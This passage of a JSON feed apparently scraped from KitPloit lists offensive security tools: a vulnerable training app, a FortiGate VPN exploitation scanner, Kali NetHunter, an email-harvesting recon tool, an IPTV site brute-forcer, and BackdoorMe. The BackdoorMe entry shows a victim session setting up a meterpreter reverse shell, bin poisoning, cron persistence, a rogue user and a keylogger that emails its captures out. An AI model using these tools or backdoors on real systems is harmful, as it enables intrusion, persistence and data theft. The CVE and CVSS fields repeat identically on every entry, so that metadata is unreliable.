"http://www.kitploit.com/2016/01/bsqlinjector-blind-sql-injection.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:29:35", "description": "[  ](<https://3.bp.blogspot.com/-eSiFhUj-buk/Vo9FG4IBH1I/AAAAAAAAFBQ/ONPScxDbINU/s1600/Hackazon.png>)\n\n \n \n\n\nHackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in today\u2019s rich client and mobile applications. Hackazon has an AJAX interface, strict workflows and RESTful API\u2019s used by a companion mobile app providing uniquely-effective training and testing ground for IT security professionals. And, it\u2019s full of your favorite vulnerabilities like SQL Injection, cross-site scripting and so on. \n\n \n\n\nToday\u2019s web and mobile applications as well as web services have a host of new technologies that are not being adequately tested for security vulnerabilities. It is critical for IT security professionals to have a vulnerable web application to use for testing the effectiveness of their tools and for honing their skills. \n\n \n\n\nHackazon enables users to configure each area of the application in order to change the vulnerability landscape to prevent \u201cknown vuln testing\u201d or any other form of \u2018cheating.\u2019 Since the application includes RESTful interfaces that power AJAX functionality and mobile clients (JSON, XML, GwT, and AMF), users will need to the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts,that are commonly used in business applications. to the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts,that are commonly used in business applications. \n\n \n** Features ** \n\n\n * REST Support - [ http://www.w3.org/2001/sw/wiki/REST ](<https://www.w3.org/2001/sw/wiki/REST>)\n * GWT Support - [ http://www.gwtproject.org ](<http://www.gwtproject.org/>)\n * AJAX and Standard HTTP Requests are Supported \n \n** Technical Details ** \n\n\n * PHP Version \u2013 5.4 \n * PHP Framework \u2013 [ http://phpixie.com/ ](<http://phpixie.com/>)\n * JS \u2013 [ http://jquery.com/ ](<https://jquery.com/>) &amp; [ http://knockoutjs.com/ ](<http://knockoutjs.com/>)\n * CSS \u2013 [ http://getbootstrap.com/ ](<https://getbootstrap.com/>)\n * DB \u2013 MySQL 5.5 with InnoDB Support \n * Web Server \u2013 Apache 2.0 \n \n** Additional Information ** \n\n\n * [ Wiki ](<https://github.com/rapid7/hackazon/wiki>)\n * CyberSecology Blog: [ Hackazon Test Site Review ](<http://cybersecology.com/hackazon-review/>)\n \n** Installation ** \n\n\n 1. Checkout the code \n 2. Set DOCUMENT_ROOT directory to /web. Make sure that htaccess and REWRITE support is enabled. \n 3. Copy /assets/config/db.sample.php to /assets/config/db.php \n 4. Change settings for DB connection in the /assets/config/db.php \n 5. Open http://yoursitename/install \n** Code structure: ** \n\n\n * ROOT \n * assets \n * classes \n * database \n * modules \n * vendor \n * web \n\n** [ Download Hackazon ](<https://github.com/rapid7/hackazon>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-10T20:30:13", "type": "kitploit", "title": "Hackazon - A Modern Vulnerable Web App", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-10T20:30:13", "id": "KITPLOIT:6516544912632048506", "href": "http://www.kitploit.com/2016/01/hackazon-modern-vulnerable-web-app.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-07T12:02:25", "description": "[](<https://1.bp.blogspot.com/-UHVncGEoQzM/X8RrroEBUbI/AAAAAAAAUgA/CpnEhlniG8cL71wLnLCRySri89V-CtwMACNcBGAsYHQ/s1183/fortiscan_1_1.jpeg>)\n\n \n\n\n(CVE-2018-13379) [Exploitation](<https://www.kitploit.com/search/label/Exploitation> \"Exploitation\" ) Tool, You can use this tool to check the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) in your FortiGate SSL-VPN. <https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability>\n\n \n\n\n[](<https://1.bp.blogspot.com/-vzR4Utm2ico/X8RrxdcqeoI/AAAAAAAAUgE/M7-FDmcmTeomtSnlCWGG2mUfC6enbT5RgCNcBGAsYHQ/s1183/fortiscan_2_2.jpeg>)\n\n \n\n\n**Usage v 0.6 File List** \n\n\n`./fortiscan ip.txt `\n\n \n**Usage v 0.5 (One Liner to Initiate the [Scan](<https://www.kitploit.com/search/label/Scan> \"Scan\" ) : Host|IP:Port(443 or 10443 or 8443)** \n\n\n`./fortiscan 192.168.1.1:10443 `\n\n \n**Requirements** \n\n\nTested with Parrot &amp; [Debian](<https://www.kitploit.com/search/label/Debian> \"Debian\" ) Operating Systems and [Windows](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) 10\n\n \n \n\n\n**[Download Fortiscan](<https://github.com/anasbousselham/fortiscan> \"Download Fortiscan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-30T11:30:00", "type": "kitploit", "title": "Fortiscan - A High Performance FortiGate SSL-VPN Vulnerability Scanning And Exploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2020-11-30T11:30:09", "id": "KITPLOIT:965198862441671998", "href": "http://www.kitploit.com/2020/11/fortiscan-high-performance-fortigate.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:28:56", "description": "[  ](<https://2.bp.blogspot.com/-5wvqR2_VNZc/Vo2Tbi1cmzI/AAAAAAAAFAM/5Al7o4mPpkQ/s1600/nethunter.png>)\n\n \n\n\n## ** What\u2019s New in Kali NetHunter 3.0 **\n\n \n\n\n### ** NetHunter Android Application Rewrite **\n\n \n\n\nThe NetHunter Android application has been totally redone and has become much more \u201capplication centric\u201d. Many new features and attacks have been added, not to mention a whole bunch of community-driven bug fixes. The NetHunter application has finally reached maturity and is now a really viable tool that helps manage complex attacks. In addition, the application now allows you to manage your Kali chroot independently, including rebuilding and deleting the chroot as needed. You can also choose to install individual metapackages in your chroot, although the default selected kali-nethunter metapackage should include all the bare necessities. \n\n \n\n\n### ** Android Lollipop and Marshmallow Support **\n\n \n\n\nYes, you heard right. NetHunter now supports Marshmallow (Android AOSP 6.x) on applicable devices \u2013 although we\u2019re not necessarily fans of the \u201clatest is best\u201d philosophy. Our favourite device continues to be the OnePlus One phone due to the combined benefits of size, CPU/RAM resources, as well as Y-Cable charging support. \n\n \n\n\n### ** New Build Scripts, Easier Integration for New Devices **\n\n \n\n\nOur rewrite also included the code that generates the images, completely porting it to Python and optimizing the build time significantly. The build process can now build small NetHunter images (~70MB) that do not include a built-in Kali chroot \u2013 allowing you do download a chroot later via the Android application. \n\n \n\n\nWe\u2019ve also made it much easier to build ports for new devices that NetHunter can run on and we\u2019ve already seen a couple of interesting PRs regarding Galaxy device support\u2026 \n\n### \n\n \n\n\n**\n\n** Fabulous NetHunter Documentation **\n\n**\n\n \n\n\nWe might be somewhat biased regarding our documentation, and perhaps it\u2019s not \u201cfabulous\u201d but just \u201cgood\u201d\u2026 but still, it\u2019s definitely much better than it was before and can be found in the form of the NetHunter Github Wiki. We\u2019ve included topics such as downloading, building and installing NetHunter, as well as a quick overview of each of the NetHunter Attacks and Features. \n\n \n\n\n### ** NetHunter Linux Root Toolkit Installer **\n\n \n\n\nWe\u2019ve got a new official NetHunter installer that runs natively on Linux or OSX. The installer is made from a set of Bash scripts which you can use to unlock, flash to stock and install the NetHunter image to supported OnePlus One or Nexus devices. Please welcome the NetHunter LRT, created by jmingov. \n\n \n\n\n \n\n\n** [ Download Kali NetHunter 3.0 ](<https://www.offensive-security.com/kali-linux-nethunter-download/>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-06T22:25:44", "type": "kitploit", "title": "Kali NetHunter 3.0 - Android Mobile Penetration Testing Platform", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-06T22:25:44", "id": "KITPLOIT:4425790137948714912", "href": "http://www.kitploit.com/2016/01/kali-nethunter-30-android-mobile.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-02T17:24:12", "description": "[  ](<https://3.bp.blogspot.com/-RZkQ0u6vNFg/Vo_nW9taBcI/AAAAAAAAFCo/eZPQT4OgZrk/s1600/simplyemail.png>)\n\n \n\n\nWhat is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester. \n\n \n** Scrape EVERYTHING - Simply ** \nCurrent Platforms Supported: \n\n\n * Kali Linux 2.0 \n * Kali Linux 1.0 \nA few small benefits: \n\n\n * Easy for you to write modules (All you need is 1 required Class option and you're up and running) \n * Use the built in Parsers for most raw results \n * Multiprocessing Queue for modules and Result Queue for easy handling of Email data \n * Simple intergration of theHarvester Modules and new ones to come \n * Also the ability to change major settings fast without diving into the code \nAPI Based Searches: \n\n\n * When API based searches become avaliable, no need to add them to the Command line \n * API keys will be auto pulled from the SimpleEmail.ini, this will activate the module for use \n \n** Get Started ** \nPlease RUN the simple Setup Bash script!!! \n\n \n \n [email\u00a0protected]:~/Desktop/SimplyEmail# sh Setup.sh\n or\n [email\u00a0protected]:~/Desktop/SimplyEmail# ./Setup.sh\n\n \n** Standard Help ** \n\n \n \n ============================================================\n Curent Version: 0.5 | Website: CyberSyndicates.com\n ============================================================\n Twitter: @real_slacker007 | Twitter: @Killswitch_gui\n ============================================================\n ------------------------------------------------------------\n ______ ________ __ __\n / \\/ | / / |\n /$$$$$$ $$$$$$$$/ _____ ____ ______ $$/$$ |\n $$ \\__$$/$$ |__ / \\/ \\ / \\/ $$ |\n $$ \\$$ | $$$$$$ $$$$ |$$$$$$ $$ $$ |\n $$$$$$ $$$$$/ $$ | $$ | $$ |/ $$ $$ $$ |\n / \\__$$ $$ |_____$$ | $$ | $$ /$$$$$$$ $$ $$ |\n $$ $$/$$ $$ | $$ | $$ $$ $$ $$ $$ |\n $$$$$$/ $$$$$$$$/$$/ $$/ $$/ $$$$$$$/$$/$$/\n \n ------------------------------------------------------------\n usage: SimplyEmail.py [-all] [-e company.com] [-l] [-t html / flickr / google]\n [-v]\n \n Email enumeration is a important phase of so many operation that a pen-tester\n or Red Teamer goes through. There are tons of applications that do this but I\n wanted a simple yet effective way to get what Recon-Ng gets and theHarvester\n gets. (You may want to run -h)\n \n optional arguments:\n -all Use all non API methods to obtain Emails\n -e company.com Set required email addr user, ex [email\u00a0protected]\n -l List the current Modules Loaded\n -t html / flickr / google\n Test individual module (For Linting)\n -v Set this switch for verbose output of modules\n\n \n** Run SimplyEmail ** \nLet's say your target is cybersyndicates.com \n\n \n \n ./SimplyEmail.py -all -e cybersyndicates.com or in verbose ./SimplyEmail.py -all -v -e cybersyndicates.com\n\nThis will run ALL modules that are have API Key placed in the SimpleEmail.ini file and will run all non-API based modules. \n \n** List Modules SimpleEmail ** \n\n \n \n [email\u00a0protected]:~/Desktop/SimplyEmail# ./SimplyEmail.py -l\n \n ============================================================\n Curent Version: 0.5 | Website: CyberSyndicates.com\n ============================================================\n Twitter: @real_slacker007 | Twitter: @Killswitch_gui\n ============================================================\n ------------------------------------------------------------\n ______ ________ __ __\n / \\/ | / / |\n /$$$$$$ $$$$$$$$/ _____ ____ ______ $$/$$ |\n $$ \\__$$/$$ |__ / \\/ \\ / \\/ $$ |\n $$ \\$$ | $$$$$$ $$$$ |$$$$$$ $$ $$ |\n $$$$$$ $$$$$/ $$ | $$ | $$ |/ $$ $$ $$ |\n / \\__$$ $$ |_____$$ | $$ | $$ /$$$$$$$ $$ $$ |\n $$ $$/$$ $$ | $$ | $$ $$ $$ $$ $$ |\n $$$$$$/ $$$$$$$$/$$/ $$/ $$/ $$$$$$$/$$/$$/\n \n ------------------------------------------------------------\n [*] Available Modules are:\n \n 1) Modules/GooglePDFSearch.py\n 2) Modules/HtmlScrape.py \n 3) Modules/GitHubUserSearch.py\n 4) Modules/Whoisolgy.py \n 5) Modules/CanaryBinSearch.py\n 6) Modules/YahooSearch.py \n 7) Modules/GitHubCodeSearch.py\n 8) Modules/OnionStagram.py \n 9) Modules/AskSearch.py \n 10) Modules/EmailHunter.py \n 11) Modules/WhoisAPISearch.py\n 12) Modules/SearchPGP.py \n 13) Modules/GoogleSearch.py \n 14) Modules/GitHubGistSearch.py\n 15) Modules/RedditPostSearch.py\n 16) Modules/FlickrSearch.py \n \n\n \n** Understanding Reporting Options: ** \nOne of the most frustrating aspects of Pen-testing is the tools' ability to report the findings and make those easily readable. This may be for the data provided to a customer or just the ability to report on source of the data. \nSo I'm making it my goal for my tools to take that work off your back and make it as simple as possible! Let's cover the two different reports generated. \n \n** Text Output: ** \nWith this option results are generated and appended to a running text file called Email_List.txt. this makes it easy to find past searches or export to tool of choice. Example: \n\n \n \n ----------------------------------\n Email Recon: 11/11/2015 05:13:32\n ----------------------------------\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n ----------------------------------\n Email Recon: 11/11/2015 05:15:42\n ----------------------------------\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n\n \n** HTML Output: ** \nAs I mentioned before a powerful function that I wanted to integrate was the ability to produce a visually appealing and rich report for the user and potentially something that could be part of data provided to a client. Please let me know with suggestions! \n \n** Email Source: ** \n\n\n[  ](<https://4.bp.blogspot.com/-mOM_PuB0umc/Vo_mBPeNsiI/AAAAAAAAFCU/Wx5KDOrGUWU/s1600/email_Screen%2BShot%2B2015-11-11%2Bat%2B5.27.15%2BPM.png>)\n\n \n \n** Email Section: ** \n\n\n * Html report now shows Alerts for Canary Search Results! \n\n[  ](<https://2.bp.blogspot.com/-hMB8ilHs1Ww/Vo_mHl5XW4I/AAAAAAAAFCc/Uc37VqvViHI/s1600/email_Screen%2BShot%2B2015-11-11%2Bat%2B5.27.31%2BPM.png>)\n\n \n \n** Current Email Evasion Techniques ** \n\n\n * The following will be built into the Parser Soon: \n * shinichiro.hamaji _ at _ gmail.com \n * shinichiro.hamaji _ AT _ gmail.com \n * simohayha.bobo at gmail.com \n * \"jeffreytgilbert\" =&gt; \"gmail.com\" \n * felix021 # gmail.com \n * hirokidaichi[at]gmail.com \n * hirokidaichi[@]gmail.com \n * hirokidaichi[#]gmail.com \n * xaicron{ at }gmail.com \n * xaicron{at}gmail.com \n * xaicron{@}gmail.com \n * xaicron(@)gmail.com \n * xaicron + gmail.com \n * xaicron ++ gmail.com \n * xaicron ## gmail.com \n * bekt17[@]gmail.com \n * billy3321 -AT- gmail.com \n * billy3321[AT]gmail.com \n * ybenjo.repose [[[at]]] gmail.com \n * sudhindra.r.rao (at) gmail.com \n * sudhindra.r.rao nospam gmail.com \n * shinichiro.hamaji (.) gmail.com \n * shinichiro.hamaji--at--gmail.com \n \n** Build Log: ** \n \n** Changelog (Current v0.6): ** \n\n \n \n ===================================\n Framework Improvements v0.7:\n -----------------------------\n (x) Add unicode / UT8 Decoding to the parser options\n (x) Added Version Check\n \n Modules Added in v0.7\n -----------------------------\n (x) Google Docx Search\n \n Issues Fixed in v0.7:\n -----------------------------\n (x) Fixed issues with Except statement in a few modules\n (x) Fixed Case Mathcing Issues with target Domain\n \n ===================================\n Modules Added in v0.6\n -----------------------------\n (x) Google Doc Search\n (x) Google Xlsx Search\n \n ===================================\n Modules Added in v0.5\n -----------------------------\n (x) Reddit Post Search added\n (x) Google PDF search\n \n ===================================\n Modules Added in v0.4\n -----------------------------\n (x) GitHubUser added\n \n Issues Fixed in v0.4:\n -----------------------------\n (x) Setup File Fix\n (x) issues with strip in Html\n \n Framework Improvements v0.4:\n -----------------------------\n (x) Added Source of email collection\n to final report in bootstrap.\n (x) Added Verbose options for Modules\n to handle Vebose printing.\n (x) Added Alerts to HTML report\n when emails are gathered from canary.\n \n ===================================\n Modules Added in v0.3:\n -----------------------------\n (x) OnionStagram (Instagram User Search)\n (x) AskSearch - Port from theHarvester\n \n Issues Fixed in v0.3:\n ----------------------------\n (x) Added Parser to GitHubCode Search\n (x) Moved wget to 2 sec timeout\n \n ===================================\n Modules Added in v0.2:\n -----------------------------\n (x) EmailHunter Trial API\n \n Issues Fixed in v0.2:\n -----------------------------\n (x) Fixed Issues with SetupScript \n (x) Changes Output Text file name\n \n ===================================\n Modules Added in v0.1:\n -----------------------------\n (x) HtmlScrape Added to Modules \n (x) SearchPGP Added to Modules - Port form theHarvester\n (x) Google Search - Port form theHarvester\n (x) Flickr Page Search\n (x) GitHub Code Search\n (x) GitHubGist Code Search\n (x) Whois Non-Auth API Search\n (x) Whoisology Search\n (x) Yahoo Search - Port from theHarvester\n (x) Canary (Non-API) PasteBin Search for Past Data Dumps!\n \n Issues Fixed in v0.1:\n -----------------------------\n (x) Wget fails to follow redirects in some cases\n (x) Fixed Issues with google search\n (x) Major change with how the Framework Handles Consumer and Producred Model\n (x) Fix Issues with Join() and Conducter\n \n Imprrovements in v0.1:\n -----------------------------\n (x) Added in valid UserAgents and headers\n (x) HTML Scrape now has opption to save or remove is mirror\n (x) HTML Scrape UTF-8 issues fixed\n\n \n** Build out Path: ** \n\n \n \n Modules Under Dev:\n -----------------------------\n ( ) StartPage Search (can help with captcha issues)\n ( ) Searching SEC Data\n ( ) Exalead Search - Port from theHarvester\n ( ) PwnBin Search \n ( ) PasteBin Searches \n ( ) Past Data Dumps\n ( ) psbdmp API Based and non Alert\n \n Framework Under Dev:\n -----------------------------\n ( ) New Parsers to clean results\n ( ) Fix import errors with Glob\n ( ) Add in \"[@]something.com\" to search Regex and engines\n ( ) Add errors for Captcha limit's\n ( ) Add Threading/Multi to GitHub Search\n ( ) Add Source of collection to HTML Output\n\n \n \n\n\n** [ Download SimplyEmail ](<https://github.com/killswitch-GUI/SimplyEmail>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-15T21:30:04", "type": "kitploit", "title": "SimplyEmail - Email Recon Made Fast And Easy, With A Framework To Build On", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-15T21:30:04", "id": "KITPLOIT:3532211766929466258", "href": "http://www.kitploit.com/2016/01/simplyemail-email-recon-made-fast-and.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T21:30:07", "description": "[  ](<https://2.bp.blogspot.com/-VXHs81ajz9A/VoxFmw_g60I/AAAAAAAAE_s/ZTfhBbOcSgk/s1600/%255DIPTV.jpg>)\n\n \n \n\n\nThis program is just a demonstration. DO NOT USE IT FOR PERSONAL purpose \n\n \n\n\n** What is this? **\n\n \n\n\nIPTV is a simple python script that let you crawl the search engines in order to fetch those sites that stream illegal tv programs. \n\n \n\n\nThis script leverage the fact the a lot of those sites use the same CMS to create the web application and sharing the service, behind a CMS there's always some exploits. We are using one simple exploit to grab and crawl the site's url and use for our purpose. \n\n \n** Ethical Dilemma ** \n \nEven though those services are illegal, stealing from a thief is still stealing. \n \n** External dependencies ** \n \nIf you want to use the ` iptv_gui ` version you need to install ` PyQt ` first \n\n\n * On Linux you can simply search it from your preferred package manager, for example on Ubuntu/Debian ` sudo apt-get install pyqt4-dev-tools `\n * On Mac OSX you can use _ brew _ to install it ` brew install sip ` &amp;&amp; ` brew install pyqt `\n * On Windows yu can download the official .exe from the PyQt site. \n \n** How to use the CLI version ** \n\n\n * Clone the repository ` git clone https://github.com/Pinperepette/IPTV `\n * ` cd ` into ` iptv `\n * run ` pip install -r requirements.txt ` in order to get the full dependencies \n * run ` python iptv_cli.py `\n * Use the application menu to do stuff \n \n** How to use the GUI version ** \n\n\n * Clone the repository ` git clone [email protected] :Pinperepette/IPTV.git `\n * ` cd ` into ` iptv `\n * run ` pip install -r requirements.txt ` in order to get the full dependencies \n * run ` python iptv_gui.py `\n * you can see an example of the GUI in the image below \n \n \n** Compatibility ** \n \nThis program work on Window, Linux, Mac OSX and BSD. The only requirement is python, better if python 3! \n \n \n\n\n** [ Download IPTV Brute-Force ](<https://github.com/Pinperepette/IPTV>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-05T22:40:17", "type": "kitploit", "title": "IPTV Brute-Force - Search And Brute Force Illegal IPTV Server", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-05T22:40:17", "id": "KITPLOIT:5376485594298165648", "href": "http://www.kitploit.com/2016/01/iptv-brute-force-search-and-brute-force.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:27:48", "description": "[  ](<https://2.bp.blogspot.com/-fkodyOyo17I/Vo9JJ0rPbKI/AAAAAAAAFBc/CtjklEnDKKM/s1600/backdoorme.png>)\n\n \n\n\nBackdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar metasploit interface with tremendous extensibility. \n\n \n\n\nBackdoorme relies on having an existing SSH connection or credentials to the victim, through which it will transfer and deploy any backdoors. In the future, this reliance will be removed as the tool is expanded. To set up SSH, please see here: [ https://help.ubuntu.com/community/SSH/OpenSSH/Configuring ](<https://help.ubuntu.com/community/SSH/OpenSSH/Configuring>)\n\n \n\n\nPlease only use Backdoorme with explicit permission - please don't hack without asking. \n\n \n \n\n\n** Usage **\n\n \n\n\nBackdoorme comes with a number of built-in backdoors, modules, and auxiliary modules. Backdoors are specific components to create and deploy a specific backdoor, such as a netcat backdoor or msfvenom backdoor. Modules can be applied to any backdoor, and are used to make backdoors more potent, stealthy, or more readily tripped. Auxiliaries are useful operations that could be performed to help persistence. \n\n \n\n\nTo start backdoorme, first ensure that you have the required dependencies. \n \n \n $ python dependencies.py\n\nLaunching backdoorme: \n \n \n $ python master.py ___ __ __ __ ___ / _ )___ _____/ /_____/ /__ ___ ____/ |/ /__ / _ / _ `/ __/ '_/ _ / _ \\/ _ \\/ __/ /|_/ / -_) /____/\\_,_/\\__/_/\\_\\\\_,_/\\___/\\___/_/ /_/ /_/\\__/ Welcome to BackdoorMe, a powerful backdooring utility. Type \"help\" to see the list of available commands. Type \"addtarget\" to set a target, and \"open\" to open an SSH connection to that target. Using local IP of 10.1.0.1. >> \n\nTo add a target: \n\n \n \n >> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >> \n\n \n** Backdoors ** \nTo use a backdoor, simply run the \"use\" keyword. \n\n \n \n >> use metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >> \n\nFrom there, you can set options pertinent to the backdoor. Run either \"show options\" or \"help\" to see a list of parameters that can be configured. To set an option, simply use the \"set\" keyword. \n\n \n \n (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False format elf format to write the backdoor to True lhost 10.1.0.1 local IP to connect back to True encoder none encoder to use for the backdoor False lport 4444 local port to connect back on True payload linux/x86/meterpreter/reverse_tcp payload to deploy in backdoor True (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ... \n\nCurrently enabled backdoors include: \n\n\n * Bash \n * Bash2 (more reliable) \n * Metasploit \n * Netcat \n * Netcat-traditional \n * Perl \n * Php (does not automatically install a web server, but use the web module!) \n * Pupy \n * Python \n * Web (php - not the same backdoor as the above php backdoor) \n \n** Modules ** \nEvery backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the \"add\" keyword. \n\n \n \n (msf) >> add poison + Poison module added \n\nEach module has additional parameters that can be customized, and if \"help\" is rerun, you can see or set any additional options. \n\n \n \n (msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False \n\nCurrently enabled modules include: \n\n\n * Poison \n * Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor. \n * For example, if the bin poisoning module is triggered with \"ls\", it would would compile and move a binary called \"ls\" that would run both an existing backdoor and the original \"ls\", thereby tripping a user to run an existing backdoor more frequently. \n * Cron \n * Adds an existing backdoor to the root user's crontab to run with a given frequency. \n\n * Web \n * Sets up a web server and places a web page which triggers the backdoor. \n * Simply visit the site with your listener open and the backdoor will begin. \n * Keylogger \n * Ships a keylogger to the target and starts it. \n * Given the option to email the results to you every hour. \n * User \n * Adds a new user to the target. \n * Startup \n * Allows for backdoors to be spawned with the bashrc and init files. \n \n** Auxiliaries ** \nIn order to have persistence be more potent, some users may wish to install certain services on a target. To apply an auxiliary module, use the \"apply\" keyword. \n\n \n \n >> apply user + User Auxiliary Module added. \n\nAuxiliaries also support the use of modules, so they can be triggered more steathily or more often. \n\n \n \n >> (user) add startup + Startup Module added. \n\nCurrently enabled auxiliaries include: \n\n\n * User \n * Adds a new user to the target. \n \n** Targets ** \nBackdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one \"current\" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: \"use metasploit 2\" will prepare the metasploit backdoor against the second target. \n \n \n\n\n** [ Download BackdoorMe 